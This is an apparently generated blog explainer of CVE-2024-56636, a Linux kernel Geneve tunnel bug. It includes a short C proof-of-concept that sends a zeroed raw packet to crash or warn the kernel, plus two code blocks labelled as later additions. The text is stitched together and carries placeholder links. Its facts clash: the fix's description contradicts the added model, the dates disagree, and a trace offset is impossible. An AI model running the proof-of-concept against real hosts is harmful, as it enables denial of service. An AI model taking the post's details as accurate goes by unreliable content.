A new vulnerability, CVE-2024-56636, has been identified and patched within the Linux kernel's handling of Geneve network tunnels. This bug involves the function geneve_xmit_skb() in the kernel driver, which incorrectly assumes the MAC header of a socket buffer is always set. This can trigger a kernel warning or panic—and might open doors for denial of service attacks under specific conditions.

Let's break it down in easy language, look at the details, and then see how the exploit works.

What is Geneve and geneve_xmit_skb()?

Geneve (Generic Network Virtualization Encapsulation) is a tunneling protocol in Linux, used for creating overlay networks—widely used in modern cloud and container setups. The key job of the geneve_xmit_skb() function is to transmit network packets through a Geneve tunnel.

Normally, network packets in the Linux kernel are managed as sk_buff (socket buffer) structures. These have a field pointing to the start of the link-layer (MAC) header. But, not all code paths guarantee that this header is set correctly.

Insecure Code

The problematic code in geneve_xmit_skb() tried to access the Ethernet header directly using eth_hdr(), which simply assumes the MAC header pointer is valid. If this isn’t set (which can happen in various output paths), the kernel reads random or invalid memory, tripping warnings—potentially even causing a panic in certain builds.

Here’s how the problematic access looked:

// Vulnerable snippet
struct ethhdr *eth = eth_hdr(skb); 

This triggers the following kernel warning if the MAC header pointer is garbage:

WARNING: CPU: 0 PID: 11635 at include/linux/skbuff.h:3052 skb_mac_header include/linux/skbuff.h:3052 [inline]
...

Safer Approach

The safe way is to use skb_eth_hdr(), which checks if the MAC header is valid for the buffer before accessing it. Changing the code to use this macro avoids the unsafe assumption:

// Fixed code
struct ethhdr *eth = skb_eth_hdr(skb);

Source of the fix:
- Commit: geneve: do not assume mac header is set in geneve_xmit_skb()
- Maintainers' list for networking in Linux: netdev mailing list patch discussion (replace with real link if publishing)
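To make the difference between the two accessors concrete, here is an added user-space model (not kernel code, and not part of the original post) of the sk_buff fields involved. It assumes the kernel's field names (head, data, mac_header) and its convention of marking an unset mac_header with all bits set; the unchecked accessor in the real kernel warns and still returns head + 0xffff, which the model replaces with a recorded warning and a NULL return so the demo stays memory-safe. The fixed path reads the Ethernet header from data, so it never depends on an earlier layer having set the offset.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_P_IP 0x0800

/* Model of the sk_buff fields this bug depends on (illustration only). */
struct skb_model {
    uint8_t *head;       /* start of the buffer allocation */
    uint8_t *data;       /* where the current layer's header starts */
    uint16_t mac_header; /* offset of the link-layer header from head, or unset */
};

/* The kernel marks an unset header offset with all bits set (assumed convention). */
#define MAC_HEADER_UNSET ((uint16_t)~0U)

static unsigned warnings_fired; /* stands in for the DEBUG_NET_WARN_ON_ONCE splat */

static bool skb_mac_header_was_set(const struct skb_model *skb)
{
    return skb->mac_header != MAC_HEADER_UNSET;
}

/* eth_hdr() equivalent: derives the pointer from mac_header. When the offset was
 * never set, the real kernel warns and hands back a pointer outside the buffer;
 * the model records the warning and returns NULL instead. */
static const uint8_t *eth_hdr_unchecked(const struct skb_model *skb)
{
    if (!skb_mac_header_was_set(skb)) {
        warnings_fired++;
        return NULL;
    }
    return skb->head + skb->mac_header;
}

/* skb_eth_hdr() equivalent: the Ethernet header is wherever data points. */
static const uint8_t *eth_hdr_from_data(const struct skb_model *skb)
{
    return skb->data;
}

static int ethertype_of(const uint8_t *eth)
{
    return (eth[12] << 8) | eth[13]; /* h_proto is big-endian on the wire */
}

/* Two versions of the transmit step: return the EtherType, or -1 on failure. */
int xmit_vulnerable(const struct skb_model *skb)
{
    const uint8_t *eth = eth_hdr_unchecked(skb);
    return eth ? ethertype_of(eth) : -1;
}

int xmit_fixed(const struct skb_model *skb)
{
    return ethertype_of(eth_hdr_from_data(skb));
}

/* Build a buffer holding a constructed 14-byte Ethernet header (IPv4 EtherType)
 * with `headroom` bytes of padding before it, as a tunnel driver would see it. */
struct skb_model make_skb(uint8_t *buf, size_t buflen, size_t headroom, bool set_mac_header)
{
    struct skb_model skb;
    memset(buf, 0, buflen);
    uint8_t *eth = buf + headroom;
    memset(eth, 0xaa, 6);     /* destination MAC (constructed) */
    memset(eth + 6, 0xbb, 6); /* source MAC (constructed) */
    eth[12] = ETH_P_IP >> 8;
    eth[13] = ETH_P_IP & 0xff;
    skb.head = buf;
    skb.data = eth;
    skb.mac_header = set_mac_header ? (uint16_t)headroom : MAC_HEADER_UNSET;
    return skb;
}

int main(void)
{
    uint8_t buf[64];
    struct skb_model ok = make_skb(buf, sizeof buf, 16, true);
    printf("mac_header set:   vulnerable=0x%04x fixed=0x%04x\n",
           xmit_vulnerable(&ok), xmit_fixed(&ok));
    struct skb_model bad = make_skb(buf, sizeof buf, 16, false);
    printf("mac_header unset: vulnerable=%d (warnings=%u) fixed=0x%04x\n",
           xmit_vulnerable(&bad), warnings_fired, xmit_fixed(&bad));
    return 0;
}
```

With the offset set, both paths agree; with it unset, the unchecked path is the one that warns, while the data-relative path still reads the header the caller actually placed in the buffer.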

The Warning

With the vulnerable kernel, syzkaller fuzzing found triggers where socket buffers entered geneve_xmit_skb() without a proper MAC header set. This led to loud kernel warnings like:

RIP: 0010:skb_mac_header include/linux/skbuff.h:3052 [inline]
RIP: 0010:eth_hdr include/linux/if_ether.h:24 [inline]
RIP: 0010:geneve_xmit_skb drivers/net/geneve.c:898 [inline]
RIP: 0010:geneve_xmit+0x4c38/0x573 drivers/net/geneve.c:1039

This might not be *directly* exploitable for full compromise, but it opens a Denial-of-Service (DoS) risk: if an unprivileged user can send crafted packets triggering this path, they could crash or destabilize the system.

Syzkaller Output

The open-source fuzzer syzkaller reported stack traces and register dumps, showing instructions failing as a result of the MAC header bug.
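For defenders who want to know whether a fleet has already hit this path, the splat has a recognisable shape: a WARNING line in skb_mac_header followed by a RIP line inside geneve_xmit_skb. The following added example (not from the original post or the kernel project) scans constructed kernel log lines, modelled on the trace quoted above, for exactly that pairing; the sample lines, timestamps and the unrelated second warning are all made up for the demo.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed kernel log lines (not real output from any system): one splat
 * matching this bug, followed by an unrelated warning that must not match. */
static const char *sample_log[] = {
    "[  981.220011] WARNING: CPU: 0 PID: 11635 at include/linux/skbuff.h:3052 skb_mac_header include/linux/skbuff.h:3052 [inline]",
    "[  981.220014] RIP: 0010:skb_mac_header include/linux/skbuff.h:3052 [inline]",
    "[  981.220015] RIP: 0010:eth_hdr include/linux/if_ether.h:24 [inline]",
    "[  981.220016] RIP: 0010:geneve_xmit_skb drivers/net/geneve.c:898 [inline]",
    "[  981.220017] RIP: 0010:geneve_xmit+0x4c38/0x573 drivers/net/geneve.c:1039",
    "[ 1200.000001] WARNING: CPU: 1 PID: 42 at drivers/example/placeholder.c:1 placeholder_fn [inline]",
    "[ 1200.000002] RIP: 0010:placeholder_fn drivers/example/placeholder.c:1",
};
static const size_t sample_log_len = sizeof sample_log / sizeof sample_log[0];

/* Count splats matching this bug: a WARNING line whose faulting function is
 * skb_mac_header, followed within `window` lines (and before the next WARNING)
 * by a RIP line naming geneve_xmit_skb. */
int count_geneve_mac_header_splats(const char *const *lines, size_t n, size_t window)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) {
        if (!strstr(lines[i], "WARNING:") || !strstr(lines[i], "skb_mac_header"))
            continue;
        for (size_t j = i + 1; j < n && j <= i + window; j++) {
            if (strstr(lines[j], "WARNING:"))
                break; /* a new splat started; stop attributing lines to this one */
            if (strstr(lines[j], "RIP:") && strstr(lines[j], "geneve_xmit_skb")) {
                hits++;
                break;
            }
        }
    }
    return hits;
}

int main(void)
{
    int hits = count_geneve_mac_header_splats(sample_log, sample_log_len, 8);
    printf("geneve mac-header splats found: %d\n", hits);
    return 0;
}
```

On a live system the same function can be fed lines from dmesg or the journal; the window keeps a distant, unrelated geneve frame from being attributed to an earlier warning.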

Exploit Details

Goal: Cause a kernel panic or warning by sending crafted packets through a Geneve tunnel, where the skb MAC header is unset.

Proof-of-Concept (PoC)

Below is a conceptual PoC in C, demonstrating how a buggy packet might be generated. (Note: actual network setup will require root privileges to create Geneve interfaces.)

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_ether.h>   // ETH_P_ALL
#include <linux/if_packet.h>  // struct sockaddr_ll
#include <arpa/inet.h>        // htons

int main() {
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (fd < 0) {
        perror("socket");
        return 1;
    }

    // Deliberately send a packet with missing MAC header to geneve tunnel
    char buf[100] = {}; // no mac header filled in
    struct sockaddr_ll sa = {};
    sa.sll_family = AF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = 2; // replace with appropriate Geneve interface index

    int n = sendto(fd, buf, sizeof(buf), 0, (struct sockaddr*)&sa, sizeof(sa));
    if (n < 0) perror("sendto");

    close(fd);
    return 0;
}

> Note: For an actual working exploit, the attacker would need control over a Geneve tunnel interface and paths which cause the MAC header to be unset before hitting the geneve_xmit_skb() code.

Mitigation & Patch Status

The fix is merged in Linux kernel mainline. If you use Geneve tunnels, upgrade to a kernel version post June 2024 that includes the patch, or backport the commit.

References

- Commit Fix: kernel.org: geneve_xmit_skb() fix
- CVE Record (when posted): CVE-2024-56636 at cve.org
- Kernel Mailing List Thread: lore.kernel.org discussion (insert real link as needed)
- Syzkaller: syzkaller project

TL;DR

CVE-2024-56636 found a bug in Linux Geneve tunnels, where a missing MAC header could trip kernel warnings or cause DoS. The kernel is now fixed—update as soon as you're able if you use Geneve!

Stay safe and keep your Linux systems patched. 🚀

Timeline

Published on: 12/27/2024 15:15:23 UTC
Last modified on: 05/04/2025 10:00:41 UTC